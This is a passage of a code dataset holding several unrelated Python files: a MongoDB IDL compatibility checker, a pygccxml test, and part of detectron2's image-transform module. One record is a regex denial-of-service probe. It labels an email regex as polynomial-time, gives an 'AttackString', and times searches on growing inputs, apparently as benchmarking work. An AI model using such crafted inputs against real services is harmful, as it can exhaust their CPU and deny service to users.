is_command_parameter else cmd_name)\n # If we encounter a bson_serialization_type of None, we skip checking if 'any' is used.\n if isinstance(\n new_field_type, syntax.Type\n ) and new_field_type.bson_serialization_type is not None and \"any\" in new_field_type.bson_serialization_type:\n # If 'any' is not explicitly allowed as the bson_serialization_type.\n any_allow = any_allow_name in ALLOW_ANY_TYPE_LIST or new_field_type.name == 'optionalBool'\n if not any_allow:\n ctxt.add_new_command_or_param_type_bson_any_not_allowed_error(\n cmd_name, new_field_type.name, old_idl_file_path, new_field.name,\n is_command_parameter)\n\n\ndef check_command_param_or_type_struct_field(\n ctxt: IDLCompatibilityContext, old_field: syntax.Field, new_field: syntax.Field,\n cmd_name: str, old_idl_file: syntax.IDLParsedSpec, new_idl_file: syntax.IDLParsedSpec,\n 
old_idl_file_path: str, new_idl_file_path: str, type_name: Optional[str],\n is_command_parameter: bool):\n \"\"\"Check compatibility between the old and new command parameter or command type struct field.\"\"\"\n # pylint: disable=too-many-arguments\n field_name: str = cmd_name + \"-param-\" + new_field.name\n if not old_field.unstable and new_field.unstable and field_name not in IGNORE_UNSTABLE_LIST:\n ctxt.add_new_param_or_command_type_field_unstable_error(\n cmd_name, old_field.name, old_idl_file_path, type_name, is_command_parameter)\n # If old field is unstable and new field is stable, the new field should either be optional or\n # have a default value.\n old_field_type = get_field_type(old_field, old_idl_file, old_idl_file_path)\n new_field_type = get_field_type(new_field, new_idl_file, new_idl_file_path)\n old_field_optional = old_field.optional or (old_field_type\n and old_field_type.name == \"optionalBool\")\n new_field_optional = new_field.optional or (new_field_type\n and new_field_type.name == \"optionalBool\")\n if old_field.unstable and not new_field.unstable and not new_field_optional and new_field.default is None:\n ctxt.add_new_param_or_command_type_field_stable_required_no_default_error(\n cmd_name, old_field.name, old_idl_file_path, type_name, is_command_parameter)\n\n if old_field_optional and not new_field_optional:\n ctxt.add_new_param_or_command_type_field_required_error(\n cmd_name, old_field.name, old_idl_file_path, type_name, is_command_parameter)\n\n if not old_field.unstable:\n check_param_or_type_validator(ctxt, old_field, new_field, cmd_name, new_idl_file_path,\n type_name, is_command_parameter)\n\n old_field_compatibility = FieldCompatibility(old_field_type, old_idl_file, old_idl_file_path,\n old_field.unstable, old_field.optional)\n new_field_compatibility = FieldCompatibility(new_field_type, new_idl_file, new_idl_file_path,\n new_field.unstable, new_field.optional)\n field_pair = FieldCompatibilityPair(old_field_compatibility, new_field_compatibility, cmd_name,\n old_field.name)\n\n check_param_or_command_type(ctxt, field_pair, is_command_parameter)\n\n\ndef check_namespace(ctxt: IDLCompatibilityContext, old_cmd: syntax.Command, new_cmd: syntax.Command,\n old_idl_file: syntax.IDLParsedSpec, new_idl_file: syntax.IDLParsedSpec,\n old_idl_file_path: str, new_idl_file_path: str):\n \"\"\"Check compatibility between old and new namespace.\"\"\"\n # pylint: disable=too-many-arguments\n old_namespace = old_cmd.namespace\n new_namespace = new_cmd.namespace\n\n # IDL parser already checks that namespace must be one of these 4 types.\n if old_namespace == common.COMMAND_NAMESPACE_IGNORED:\n if new_namespace != common.COMMAND_NAMESPACE_IGNORED:\n ctxt.add_new_namespace_incompatible_error(old_cmd.command_name, old_namespace,\n new_namespace, new_idl_file_path)\n elif old_namespace == common.COMMAND_NAMESPACE_CONCATENATE_WITH_DB_OR_UUID:\n if new_namespace not in (common.COMMAND_NAMESPACE_IGNORED,\n common.COMMAND_NAMESPACE_CONCATENATE_WITH_DB_OR_UUID):\n ctxt.add_new_namespace_incompatible_error(old_cmd.command_name, old_namespace,\n new_namespace, new_idl_file_path)\n elif old_namespace == common.COMMAND_NAMESPACE_CONCATENATE_WITH_DB:\n if new_namespace == common.COMMAND_NAMESPACE_TYPE:\n ctxt.add_new_namespace_incompatible_error(old_cmd.command_name, old_namespace,\n new_namespace, new_idl_file_path)\n elif old_namespace == common.COMMAND_NAMESPACE_TYPE:\n old_type = get_field_type(old_cmd, old_idl_file, old_idl_file_path)\n if new_namespace == 
common.COMMAND_NAMESPACE_TYPE:\n new_type = get_field_type(new_cmd, new_idl_file, new_idl_file_path)\n old = FieldCompatibility(old_type, old_idl_file, old_idl_file_path, unstable=False,\n optional=False)\n new = FieldCompatibility(new_type, new_idl_file, new_idl_file_path, unstable=False,\n optional=False)\n\n check_param_or_command_type(ctxt,\n FieldCompatibilityPair(old, new, old_cmd.command_name, \"\"),\n is_command_parameter=False)\n\n # If old type is \"namespacestring\", the new namespace can be changed to any\n # of the other namespace types.\n elif old_type.name != \"namespacestring\":\n # Otherwise, the new namespace can only be changed to \"ignored\".\n if new_namespace != common.COMMAND_NAMESPACE_IGNORED:\n ctxt.add_new_namespace_incompatible_error(old_cmd.command_name, old_namespace,\n new_namespace, new_idl_file_path)\n else:\n assert False, 'unrecognized namespace option'\n\n\ndef check_error_reply(old_basic_types_path: str, new_basic_types_path: str,\n old_import_directories: List[str],\n new_import_directories: List[str]) -> IDLCompatibilityErrorCollection:\n \"\"\"Check IDL compatibility between old and new ErrorReply.\"\"\"\n old_idl_dir = os.path.dirname(old_basic_types_path)\n new_idl_dir = os.path.dirname(new_basic_types_path)\n ctxt = IDLCompatibilityContext(old_idl_dir, new_idl_dir, IDLCompatibilityErrorCollection())\n with open(old_basic_types_path) as old_file:\n old_idl_file = parser.parse(old_file, old_basic_types_path,\n CompilerImportResolver(old_import_directories))\n if old_idl_file.errors:\n old_idl_file.errors.dump_errors()\n raise ValueError(f\"Cannot parse {old_basic_types_path}\")\n\n old_error_reply_struct = old_idl_file.spec.symbols.get_struct(\"ErrorReply\")\n\n if old_error_reply_struct is None:\n ctxt.add_missing_error_reply_struct_error(old_basic_types_path)\n else:\n with open(new_basic_types_path) as new_file:\n new_idl_file = parser.parse(new_file, new_basic_types_path,\n CompilerImportResolver(new_import_directories))\n if new_idl_file.errors:\n new_idl_file.errors.dump_errors()\n raise ValueError(f\"Cannot parse {new_basic_types_path}\")\n\n new_error_reply_struct = new_idl_file.spec.symbols.get_struct(\"ErrorReply\")\n if new_error_reply_struct is None:\n ctxt.add_missing_error_reply_struct_error(new_basic_types_path)\n else:\n check_reply_fields(ctxt, old_error_reply_struct, new_error_reply_struct, \"n/a\",\n old_idl_file, new_idl_file, old_basic_types_path,\n new_basic_types_path)\n\n ctxt.errors.dump_errors()\n return ctxt.errors\n\n\ndef split_complex_checks(\n complex_checks: List[syntax.AccessCheck]) -> Tuple[List[str], List[syntax.Privilege]]:\n \"\"\"Split a list of AccessCheck into checks and privileges.\"\"\"\n checks = [x.check for x in complex_checks if x.check is not None]\n privileges = [x.privilege for x in complex_checks if x.privilege is not None]\n # Sort the list of privileges by the length of the action_type list, in decreasing order\n # so that two lists of privileges can be compared later.\n return checks, sorted(privileges, key=lambda x: len(x.action_type), reverse=True)\n\n\ndef check_complex_checks(ctxt: IDLCompatibilityContext,\n old_complex_checks: List[syntax.AccessCheck],\n new_complex_checks: List[syntax.AccessCheck], cmd: syntax.Command,\n new_idl_file_path: str) -> None:\n \"\"\"Check the compatibility between complex access checks of the old and new command.\"\"\"\n cmd_name = cmd.command_name\n if len(new_complex_checks) > len(old_complex_checks):\n 
ctxt.add_new_additional_complex_access_check_error(cmd_name, new_idl_file_path)\n else:\n old_checks, old_privileges = split_complex_checks(old_complex_checks)\n new_checks, new_privileges = split_complex_checks(new_complex_checks)\n if not set(new_checks).issubset(old_checks):\n ctxt.add_new_complex_checks_not_subset_error(cmd_name, new_idl_file_path)\n\n if len(new_privileges) > len(old_privileges):\n ctxt.add_new_complex_privileges_not_subset_error(cmd_name, new_idl_file_path)\n else:\n # Check that each new_privilege matches an old_privilege (the resource_pattern is\n # equal and the action_types are a subset of the old action_types).\n for new_privilege in new_privileges:\n for old_privilege in old_privileges:\n if (new_privilege.resource_pattern == old_privilege.resource_pattern\n and set(new_privilege.action_type).issubset(old_privilege.action_type)):\n old_privileges.remove(old_privilege)\n break\n else:\n ctxt.add_new_complex_privileges_not_subset_error(cmd_name, new_idl_file_path)\n\n\ndef split_complex_checks_agg_stages(\n complex_checks: List[syntax.AccessCheck]) -> Dict[str, List[syntax.AccessCheck]]:\n \"\"\"Split a list of AccessChecks into a map keyed by aggregation stage (defaults to None).\"\"\"\n complex_checks_agg_stages: Dict[str, List[syntax.AccessCheck]] = dict()\n for access_check in complex_checks:\n agg_stage = None\n if access_check.privilege is not None:\n # x.privilege.agg_stage can still be None.\n agg_stage = access_check.privilege.agg_stage\n if agg_stage not in complex_checks_agg_stages:\n complex_checks_agg_stages[agg_stage] = []\n complex_checks_agg_stages[agg_stage].append(access_check)\n return complex_checks_agg_stages\n\n\ndef check_complex_checks_agg_stages(ctxt: IDLCompatibilityContext,\n old_complex_checks: List[syntax.AccessCheck],\n new_complex_checks: List[syntax.AccessCheck],\n cmd: syntax.Command, new_idl_file_path: str) -> None:\n \"\"\"Check the compatibility between complex access checks of the old and new agggreation stages.\"\"\"\n new_complex_checks_agg_stages = split_complex_checks_agg_stages(new_complex_checks)\n old_complex_checks_agg_stages = split_complex_checks_agg_stages(old_complex_checks)\n for agg_stage in new_complex_checks_agg_stages:\n # Aggregation stages are considered separate commands in the context of validating the\n # Stable API. 
Therefore, it is okay to skip recently added aggregation stages that are\n # are not present in the previous release.\n if agg_stage not in old_complex_checks_agg_stages:\n continue\n check_complex_checks(ctxt, old_complex_checks_agg_stages[agg_stage],\n new_complex_checks_agg_stages[agg_stage], cmd, new_idl_file_path)\n\n\ndef check_security_access_checks(ctxt: IDLCompatibilityContext,\n old_access_checks: syntax.AccessChecks,\n new_access_checks: syntax.AccessChecks, cmd: syntax.Command,\n new_idl_file_path: str) -> None:\n \"\"\"Check the compatibility between security access checks of the old and new command.\"\"\"\n # pylint:disable=too-many-locals,too-many-branches,too-many-nested-blocks\n cmd_name = cmd.command_name\n if old_access_checks is not None and new_access_checks is not None:\n old_access_check_type = old_access_checks.get_access_check_type()\n new_access_check_type = new_access_checks.get_access_check_type()\n if old_access_check_type != new_access_check_type:\n ctxt.add_access_check_type_not_equal_error(cmd_name, old_access_check_type,\n new_access_check_type, new_idl_file_path)\n else:\n old_simple_check = old_access_checks.simple\n new_simple_check = new_access_checks.simple\n if old_simple_check is not None and new_simple_check is not None:\n if old_simple_check.check != new_simple_check.check:\n ctxt.add_check_not_equal_error(cmd_name, old_simple_check.check,\n new_simple_check.check, new_idl_file_path)\n else:\n old_privilege = old_simple_check.privilege\n new_privilege = new_simple_check.privilege\n if old_privilege is not None and new_privilege is not None:\n if old_privilege.resource_pattern != new_privilege.resource_pattern:\n ctxt.add_resource_pattern_not_equal_error(\n cmd_name, old_privilege.resource_pattern,\n new_privilege.resource_pattern, new_idl_file_path)\n if not set(new_privilege.action_type).issubset(old_privilege.action_type):\n ctxt.add_new_action_types_not_subset_error(cmd_name, new_idl_file_path)\n\n old_complex_checks = old_access_checks.complex\n new_complex_checks = new_access_checks.complex\n if old_complex_checks is not None and new_complex_checks is not None:\n check_complex_checks_agg_stages(ctxt, old_complex_checks, new_complex_checks, cmd,\n new_idl_file_path)\n\n elif new_access_checks is None and old_access_checks is not None:\n ctxt.add_removed_access_check_field_error(cmd_name, new_idl_file_path)\n elif old_access_checks is None and new_access_checks is not None and cmd.api_version == '1':\n ctxt.add_added_access_check_field_error(cmd_name, new_idl_file_path)\n\n\ndef check_compatibility(old_idl_dir: str, new_idl_dir: str, old_import_directories: List[str],\n new_import_directories: List[str]) -> IDLCompatibilityErrorCollection:\n \"\"\"Check IDL compatibility between old and new IDL commands.\"\"\"\n # pylint: disable=too-many-locals\n ctxt = IDLCompatibilityContext(old_idl_dir, new_idl_dir, IDLCompatibilityErrorCollection())\n\n new_commands, new_command_file, new_command_file_path = get_new_commands(\n ctxt, new_idl_dir, new_import_directories)\n\n # Check new commands' compatibility with old ones.\n # Note, a command can be added to V1 at any time, it's ok if a\n # new command has no corresponding old command.\n old_commands: Dict[str, syntax.Command] = dict()\n for dirpath, _, filenames in os.walk(old_idl_dir):\n for old_filename in filenames:\n if not old_filename.endswith('.idl') or old_filename in SKIPPED_FILES:\n continue\n\n old_idl_file_path = os.path.join(dirpath, old_filename)\n with open(old_idl_file_path) as old_file:\n 
old_idl_file = parser.parse(\n old_file, old_idl_file_path,\n CompilerImportResolver(old_import_directories + [old_idl_dir]))\n if old_idl_file.errors:\n old_idl_file.errors.dump_errors()\n raise ValueError(f\"Cannot parse {old_idl_file_path}\")\n\n for old_cmd in old_idl_file.spec.symbols.commands:\n # Ignore imported commands as they will be processed in their own file.\n if old_cmd.api_version == \"\" or old_cmd.imported:\n continue\n\n # Ignore select commands that were removed after being added to the strict API.\n # Only commands that were never visible to the end-user in previous releases\n # (i.e., hidden behind a feature flag) should be allowed here.\n if old_cmd.command_name in IGNORE_COMMANDS_LIST:\n continue\n\n if old_cmd.api_version != \"1\":\n # We're not ready to handle future API versions yet.\n ctxt.add_command_invalid_api_version_error(\n old_cmd.command_name, old_cmd.api_version, old_idl_file_path)\n continue\n\n if old_cmd.command_name in old_commands:\n ctxt.add_duplicate_command_name_error(old_cmd.command_name, old_idl_dir,\n old_idl_file_path)\n continue\n\n old_commands[old_cmd.command_name] = old_cmd\n\n if old_cmd.command_name not in new_commands:\n # Can't remove a command from V1\n ctxt.add_command_removed_error(old_cmd.command_name, old_idl_file_path)\n continue\n\n new_cmd = new_commands[old_cmd.command_name]\n new_idl_file = new_command_file[old_cmd.command_name]\n new_idl_file_path = new_command_file_path[old_cmd.command_name]\n\n if not old_cmd.strict and new_cmd.strict:\n ctxt.add_command_strict_true_error(new_cmd.command_name, new_idl_file_path)\n\n # Check compatibility of command's parameters.\n check_command_params_or_type_struct_fields(\n ctxt, old_cmd, new_cmd, old_cmd.command_name, old_idl_file, new_idl_file,\n old_idl_file_path, new_idl_file_path, is_command_parameter=True)\n\n check_namespace(ctxt, old_cmd, new_cmd, old_idl_file, new_idl_file,\n old_idl_file_path, new_idl_file_path)\n\n old_reply = old_idl_file.spec.symbols.get_struct(old_cmd.reply_type)\n new_reply = new_idl_file.spec.symbols.get_struct(new_cmd.reply_type)\n check_reply_fields(ctxt, old_reply, new_reply, old_cmd.command_name,\n old_idl_file, new_idl_file, old_idl_file_path,\n new_idl_file_path)\n\n check_security_access_checks(ctxt, old_cmd.access_check, new_cmd.access_check,\n old_cmd, new_idl_file_path)\n\n ctxt.errors.dump_errors()\n return ctxt.errors\n\n\ndef get_generic_arguments(gen_args_file_path: str) -> Tuple[Set[str], Set[str]]:\n \"\"\"Get arguments and reply fields from generic_argument.idl and check validity.\"\"\"\n arguments: Set[str] = set()\n reply_fields: Set[str] = set()\n\n with open(gen_args_file_path) as gen_args_file:\n parsed_idl_file = parser.parse(gen_args_file, gen_args_file_path,\n CompilerImportResolver([]))\n if parsed_idl_file.errors:\n parsed_idl_file.errors.dump_errors()\n raise ValueError(f\"Cannot parse {gen_args_file_path}\")\n for argument in parsed_idl_file.spec.symbols.get_generic_argument_list(\n \"generic_args_api_v1\").fields:\n arguments.add(argument.name)\n\n for reply_field in parsed_idl_file.spec.symbols.get_generic_reply_field_list(\n \"generic_reply_fields_api_v1\").fields:\n reply_fields.add(reply_field.name)\n\n return arguments, reply_fields\n\n\ndef check_generic_arguments_compatibility(old_gen_args_file_path: str, new_gen_args_file_path: str\n ) -> IDLCompatibilityErrorCollection:\n \"\"\"Check IDL compatibility between old and new generic_argument.idl files.\"\"\"\n # IDLCompatibilityContext takes in both 'old_idl_dir' and 
'new_idl_dir',\n # but for generic_argument.idl, the parent directories aren't helpful for logging purposes.\n # Instead, we pass in \"old generic_argument.idl\" and \"new generic_argument.idl\"\n # to make error messages clearer.\n ctxt = IDLCompatibilityContext(\"old generic_argument.idl\", \"new generic_argument.idl\",\n IDLCompatibilityErrorCollection())\n\n old_arguments, old_reply_fields = get_generic_arguments(old_gen_args_file_path)\n new_arguments, new_reply_fields = get_generic_arguments(new_gen_args_file_path)\n\n for old_argument in old_arguments:\n if old_argument not in new_arguments:\n ctxt.add_generic_argument_removed(old_argument, new_gen_args_file_path)\n\n for old_reply_field in old_reply_fields:\n if old_reply_field not in new_reply_fields:\n ctxt.add_generic_argument_removed_reply_field(old_reply_field, new_gen_args_file_path)\n\n return ctxt.errors\n\n\ndef main():\n \"\"\"Run the script.\"\"\"\n arg_parser = argparse.ArgumentParser(description=__doc__)\n arg_parser.add_argument(\"-v\", \"--verbose\", action=\"count\", help=\"Enable verbose logging\")\n arg_parser.add_argument(\"--old-include\", dest=\"old_include\", type=str, action=\"append\",\n default=[], help=\"Directory to search for old IDL import files\")\n arg_parser.add_argument(\"--new-include\", dest=\"new_include\", type=str, action=\"append\",\n default=[], help=\"Directory to search for new IDL import files\")\n arg_parser.add_argument(\"old_idl_dir\", metavar=\"OLD_IDL_DIR\",\n help=\"Directory where old IDL files are located\")\n arg_parser.add_argument(\"new_idl_dir\", metavar=\"NEW_IDL_DIR\",\n help=\"Directory where new IDL files are located\")\n args = arg_parser.parse_args()\n\n error_coll = check_compatibility(args.old_idl_dir, args.new_idl_dir, args.old_include,\n args.new_include)\n if error_coll.has_errors():\n sys.exit(1)\n\n old_basic_types_path = os.path.join(args.old_idl_dir, \"mongo/idl/basic_types.idl\")\n new_basic_types_path = os.path.join(args.new_idl_dir, \"mongo/idl/basic_types.idl\")\n error_reply_coll = check_error_reply(old_basic_types_path, new_basic_types_path,\n args.old_include, args.new_include)\n if error_reply_coll.has_errors():\n sys.exit(1)\n\n old_generic_args_path = os.path.join(args.old_idl_dir, \"mongo/idl/generic_argument.idl\")\n new_generic_args_path = os.path.join(args.new_idl_dir, \"mongo/idl/generic_argument.idl\")\n error_gen_args_coll = check_generic_arguments_compatibility(old_generic_args_path,\n new_generic_args_path)\n if error_gen_args_coll.has_errors():\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a30f45ca26af266dfc1cf05df3ed7b0940f5bc4", "content": "# 7094\n# ^([a-zA-Z0-9]+[._-])*[a-zA-Z0-9]+@(([a-zA-Z0-9]+|([a-zA-Z0-9]+[.-])+)[a-zA-Z0-9]+\\.[a-zA-Z]{2,4}|([a-zA-Z]\\.com))$\n# POLYNOMIAL\n# nums:5\n# POLYNOMIAL AttackString:\"a@\"+\"a\"*10000+\"!1 _SLQ_2\"\n\nimport re2 as re\nfrom time import perf_counter\n\nregex = \"\"\"^([a-zA-Z0-9]+[._-])*[a-zA-Z0-9]+@(([a-zA-Z0-9]+|([a-zA-Z0-9]+[.-])+)[a-zA-Z0-9]+\\.[a-zA-Z]{2,4}|([a-zA-Z]\\.com))$\"\"\"\nREGEX = re.compile(regex)\nfor i in range(0, 150000):\n ATTACK = \"a@\" + \"a\" * i * 10000 + \"!1 _SLQ_2\"\n LEN = len(ATTACK)\n BEGIN = perf_counter()\n m = REGEX.search(ATTACK)\n # m = REGEX.match(ATTACK)\n DURATION = perf_counter() - BEGIN\n print(f\"{i *10000}: took {DURATION} seconds!\")"} {"ext": "py", "sha": "1a30f4879cacb25046c87c21c2b57560b724e379", "content": "# Copyright 2014-2017 Insight Software Consortium.\n# Copyright 2004-2009 Roman Yakovenko.\n# 
Distributed under the Boost Software License, Version 1.0.\n# See http://www.boost.org/LICENSE_1_0.txt\n\nimport unittest\nimport logging\n\nfrom . import parser_test_case\n\nfrom pygccxml import utils\n\n\nclass Test(parser_test_case.parser_test_case_t):\n mock_logger = logging.getLogger(\"Test\")\n\n def test_old_xml_generators(self):\n \"\"\"\n Tests for the xml_generators class.\n\n This is for gccxml and for castxml using the gccxml xml file format\n \"\"\"\n self._test_impl(\"0.6\", False, \"is_gccxml_06\")\n self._test_impl(\"1.114\", False, \"is_gccxml_07\")\n self._test_impl(\"1.115\", False, \"is_gccxml_09_buggy\")\n self._test_impl(\"1.126\", False, \"is_gccxml_09_buggy\")\n self._test_impl(\"1.127\", False, \"is_gccxml_09\")\n self._test_impl(\"1.136\", True, \"is_castxml\")\n\n def test_casxtml_epic_version_1(self):\n \"\"\"\n Test with the castxml epic version set to 1\n \"\"\"\n gen = utils.xml_generators(\n self.mock_logger, castxml_format=\"1.1.0\")\n self.assertFalse(gen.is_gccxml)\n self.assertTrue(gen.is_castxml)\n self.assertTrue(gen.is_castxml1)\n self.assertEqual(gen.xml_output_version, \"1.1.0\")\n\n self.assertRaises(RuntimeError, lambda: utils.xml_generators(\n self.mock_logger, \"1.136\", \"1.1.0\"))\n\n self.assertRaises(RuntimeError, lambda: utils.xml_generators(\n self.mock_logger, None, None))\n\n def _test_impl(\n self, gccxml_cvs_revision, is_castxml,\n expected_gccxml_cvs_revision):\n \"\"\"\n Implementation detail for the test\n\n Args:\n gccxml_cvs_revision (str|None) : a known cvs revision\n is_castxml (bool): check for castxml\n expected_gccxml_cvs_revision (str): will be used to check if the\n attribute is set to True.\n \"\"\"\n gen = utils.xml_generators(\n self.mock_logger, gccxml_cvs_revision)\n if is_castxml:\n self.assertFalse(gen.is_gccxml)\n self.assertTrue(gen.is_castxml)\n else:\n self.assertTrue(gen.is_gccxml)\n self.assertFalse(gen.is_castxml)\n self.assertTrue(getattr(gen, expected_gccxml_cvs_revision))\n self.assertEqual(gen.xml_output_version, gccxml_cvs_revision)\n\n\ndef create_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(Test))\n return suite\n\n\ndef run_suite():\n unittest.TextTestRunner(verbosity=2).run(create_suite())\n\n\nif __name__ == \"__main__\":\n run_suite()\n"} {"ext": "py", "sha": "1a30f4a6d80dec42a68c7b27633063e1e23f7f05", "content": "# -*- coding: utf-8 -*-\n# Copyright (c) Facebook, Inc. and its affiliates. 
All Rights Reserved\n# File: transformer.py\n\nimport inspect\nimport numpy as np\nimport pprint\nimport sys\nfrom abc import ABCMeta, abstractmethod\nfrom fvcore.transforms.transform import (\n BlendTransform,\n CropTransform,\n HFlipTransform,\n NoOpTransform,\n Transform,\n TransformList,\n VFlipTransform,\n)\nfrom PIL import Image\n\nfrom .transform import ExtentTransform, ResizeTransform, RotationTransform\n\n__all__ = [\n \"RandomApply\",\n \"RandomBrightness\",\n \"RandomContrast\",\n \"RandomCrop\",\n \"RandomExtent\",\n \"RandomFlip\",\n \"RandomSaturation\",\n \"RandomLighting\",\n \"RandomRotation\",\n \"Resize\",\n \"ResizeShortestEdge\",\n \"TransformGen\",\n \"apply_transform_gens\",\n]\n\n\ndef check_dtype(img):\n assert isinstance(img, np.ndarray), \"[TransformGen] Needs an numpy array, but got a {}!\".format(\n type(img)\n )\n assert not isinstance(img.dtype, np.integer) or (\n img.dtype == np.uint8\n ), \"[TransformGen] Got image of type {}, use uint8 or floating points instead!\".format(\n img.dtype\n )\n assert img.ndim in [2, 3], img.ndim\n\n\nclass TransformGen(metaclass=ABCMeta):\n \"\"\"\n TransformGen takes an image of type uint8 in range [0, 255], or\n floating point in range [0, 1] or [0, 255] as input.\n\n It creates a :class:`Transform` based on the given image, sometimes with randomness.\n The transform can then be used to transform images\n or other data (boxes, points, annotations, etc.) associated with it.\n\n The assumption made in this class\n is that the image itself is sufficient to instantiate a transform.\n When this assumption is not true, you need to create the transforms by your own.\n\n A list of `TransformGen` can be applied with :func:`apply_transform_gens`.\n \"\"\"\n\n def _init(self, params=None):\n if params:\n for k, v in params.items():\n if k != \"self\" and not k.startswith(\"_\"):\n setattr(self, k, v)\n\n @abstractmethod\n def get_transform(self, img):\n pass\n\n def _rand_range(self, low=1.0, high=None, size=None):\n \"\"\"\n Uniform float random number between low and high.\n \"\"\"\n if high is None:\n low, high = 0, low\n if size is None:\n size = []\n return np.random.uniform(low, high, size)\n\n def __repr__(self):\n \"\"\"\n Produce something like:\n \"MyTransformGen(field1={self.field1}, field2={self.field2})\"\n \"\"\"\n try:\n sig = inspect.signature(self.__init__)\n classname = type(self).__name__\n argstr = []\n for name, param in sig.parameters.items():\n assert (\n param.kind != param.VAR_POSITIONAL and param.kind != param.VAR_KEYWORD\n ), \"The default __repr__ doesn't support *args or **kwargs\"\n assert hasattr(self, name), (\n \"Attribute {} not found! \"\n \"Default __repr__ only works if attributes match the constructor.\".format(name)\n )\n attr = getattr(self, name)\n default = param.default\n if default is attr:\n continue\n argstr.append(\"{}={}\".format(name, pprint.pformat(attr)))\n return \"{}({})\".format(classname, \", \".join(argstr))\n except AssertionError:\n return super().__repr__()\n\n __str__ = __repr__\n\n\nclass RandomApply(TransformGen):\n \"\"\"\n Randomly apply the wrapper transformation with a given probability.\n \"\"\"\n\n def __init__(self, transform, prob=0.5):\n \"\"\"\n Args:\n transform (Transform, TransformGen): the transform to be wrapped\n by the `RandomApply`. 
The `transform` can either be a\n `Transform` or `TransformGen` instance.\n prob (float): probability between 0.0 and 1.0 that\n the wrapper transformation is applied\n \"\"\"\n super().__init__()\n assert isinstance(transform, (Transform, TransformGen)), (\n f\"The given transform must either be a Transform or TransformGen instance. \"\n f\"Not {type(transform)}\"\n )\n assert 0.0 <= prob <= 1.0, f\"Probablity must be between 0.0 and 1.0 (given: {prob})\"\n self.prob = prob\n self.transform = transform\n\n def get_transform(self, img):\n do = self._rand_range() < self.prob\n if do:\n if isinstance(self.transform, TransformGen):\n return self.transform.get_transform(img)\n else:\n return self.transform\n else:\n return NoOpTransform()\n\n\nclass RandomFlip(TransformGen):\n \"\"\"\n Flip the image horizontally or vertically with the given probability.\n \"\"\"\n\n def __init__(self, prob=0.5, *, horizontal=True, vertical=False):\n \"\"\"\n Args:\n prob (float): probability of flip.\n horizontal (boolean): whether to apply horizontal flipping\n vertical (boolean): whether to apply vertical flipping\n \"\"\"\n super().__init__()\n\n if horizontal and vertical:\n raise ValueError(\"Cannot do both horiz and vert. Please use two Flip instead.\")\n if not horizontal and not vertical:\n raise ValueError(\"At least one of horiz or vert has to be True!\")\n self._init(locals())\n\n def get_transform(self, img):\n h, w = img.shape[:2]\n do = self._rand_range() < self.prob\n if do:\n if self.horizontal:\n return HFlipTransform(w)\n elif self.vertical:\n return VFlipTransform(h)\n else:\n return NoOpTransform()\n\n\nclass Resize(TransformGen):\n \"\"\" Resize image to a target size\"\"\"\n\n def __init__(self, shape, interp=Image.BILINEAR):\n \"\"\"\n Args:\n shape: (h, w) tuple or a int\n interp: PIL interpolation method\n \"\"\"\n if isinstance(shape, int):\n shape = (shape, shape)\n shape = tuple(shape)\n self._init(locals())\n\n def get_transform(self, img):\n return ResizeTransform(\n img.shape[0], img.shape[1], self.shape[0], self.shape[1], self.interp\n )\n\n\nclass ResizeShortestEdge(TransformGen):\n \"\"\"\n Scale the shorter edge to the given size, with a limit of `max_size` on the longer edge.\n If `max_size` is reached, then downscale so that the longer edge does not exceed max_size.\n \"\"\"\n\n def __init__(\n self, short_edge_length, max_size=sys.maxsize, sample_style=\"range\", interp=Image.BILINEAR\n ):\n \"\"\"\n Args:\n short_edge_length (list[int]): If ``sample_style==\"range\"``,\n a [min, max] interval from which to sample the shortest edge length.\n If ``sample_style==\"choice\"``, a list of shortest edge lengths to sample from.\n max_size (int): maximum allowed longest edge length.\n sample_style (str): either \"range\" or \"choice\".\n \"\"\"\n super().__init__()\n assert sample_style in [\"range\", \"choice\"], sample_style\n\n self.is_range = sample_style == \"range\"\n if isinstance(short_edge_length, int):\n short_edge_length = (short_edge_length, short_edge_length)\n self._init(locals())\n\n def get_transform(self, img):\n h, w = img.shape[:2]\n\n if self.is_range:\n size = np.random.randint(self.short_edge_length[0], self.short_edge_length[1] + 1)\n else:\n size = np.random.choice(self.short_edge_length)\n if size == 0:\n return NoOpTransform()\n\n scale = size * 1.0 / min(h, w)\n if h < w:\n newh, neww = size, scale * w\n else:\n newh, neww = scale * h, size\n if max(newh, neww) > self.max_size:\n scale = self.max_size * 1.0 / max(newh, neww)\n newh = newh * scale\n neww 
= neww * scale\n neww = int(neww + 0.5)\n newh = int(newh + 0.5)\n return ResizeTransform(h, w, newh, neww, self.interp)\n\n\nclass RandomRotation(TransformGen):\n \"\"\"\n This method returns a copy of this image, rotated the given\n number of degrees counter clockwise around the given center.\n \"\"\"\n\n def __init__(self, angle, expand=True, center=None, sample_style=\"range\", interp=None):\n \"\"\"\n Args:\n angle (list[float]): If ``sample_style==\"range\"``,\n a [min, max] interval from which to sample the angle (in degrees).\n If ``sample_style==\"choice\"``, a list of angles to sample from\n expand (bool): choose if the image should be resized to fit the whole\n rotated image (default), or simply cropped\n center (list[[float, float]]): If ``sample_style==\"range\"``,\n a [[minx, miny], [maxx, maxy]] relative interval from which to sample the center,\n [0, 0] being the top left of the image and [1, 1] the bottom right.\n If ``sample_style==\"choice\"``, a list of centers to sample from\n Default: None, which means that the center of rotation is the center of the image\n center has no effect if expand=True because it only affects shifting\n \"\"\"\n super().__init__()\n assert sample_style in [\"range\", \"choice\"], sample_style\n self.is_range = sample_style == \"range\"\n if isinstance(angle, (float, int)):\n angle = (angle, angle)\n if center is not None and isinstance(center[0], (float, int)):\n center = (center, center)\n self._init(locals())\n\n def get_transform(self, img):\n h, w = img.shape[:2]\n center = None\n if self.is_range:\n angle = np.random.uniform(self.angle[0], self.angle[1])\n if self.center is not None:\n center = (\n np.random.uniform(self.center[0][0], self.center[1][0]),\n np.random.uniform(self.center[0][1], self.center[1][1]),\n )\n else:\n angle = np.random.choice(self.angle)\n if self.center is not None:\n center = np.random.choice(self.center)\n\n if center is not None:\n center = (w * center[0], h * center[1]) # Convert to absolute coordinates\n\n return RotationTransform(h, w, angle, expand=self.expand, center=center, interp=self.interp)\n\n\nclass RandomCrop(TransformGen):\n \"\"\"\n Randomly crop a subimage out of an image.\n \"\"\"\n\n def __init__(self, crop_type: str, crop_size):\n \"\"\"\n Args:\n crop_type (str): one of \"relative_range\", \"relative\", \"absolute\".\n See `config/defaults.py` for explanation.\n crop_size (tuple[float]): the relative ratio or absolute pixels of\n height and width\n \"\"\"\n super().__init__()\n assert 